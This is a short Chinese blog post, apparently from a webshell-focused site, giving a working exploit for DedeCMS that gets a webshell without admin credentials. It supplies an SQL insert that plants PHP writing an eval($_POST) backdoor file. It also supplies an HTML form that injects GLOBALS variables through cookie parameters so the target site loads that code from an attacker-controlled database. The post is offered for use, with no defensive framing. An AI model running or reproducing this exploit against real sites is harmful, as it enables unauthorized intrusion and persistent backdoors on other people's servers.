配合刚暴的织梦不用管理员帐号和密码就能进后台的漏洞

(https://www.webshell.cc/313.html)

拿webshell的方法如下:

网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.

前题条件,必须准备好自己的dede数据库,然后插入数据:

insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'<?php eval($_POST[c]) ?>\');echo "OK";@fclose($fp);{/dede:php}');

再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。

<form id="QuickSearch" action="" method="post" name="QuickSearch" onsubmit="addaction();"><input style="width: 400;" type="text" name="doaction" value="https://www.webshell.cc/plus/mytag_js.php?aid=1" />

<input style="width: 400;" type="text" name="_COOKIE[GLOBALS][cfg_dbhost]" value="dbhost" />

<input style="width: 400;" type="text" name="_COOKIE[GLOBALS][cfg_dbuser]" value="dbuser" />

<input style="width: 400;" type="text" name="_COOKIE[GLOBALS][cfg_dbpwd]" value="dbpwd" />

<input style="width: 400;" type="text" name="_COOKIE[GLOBALS][cfg_dbname]" value="dbname" />

<input style="width: 400;" type="text" name="_COOKIE[GLOBALS][cfg_dbprefix]" value="dede_" />

<input style="width: 400;" type="text" name="nocache" value="true" />
<input type="submit" name="QuickSearchBtn" value="提交" />

</form><script type="text/javascript">// <![CDATA[
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
// ]]></script>

转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/318.html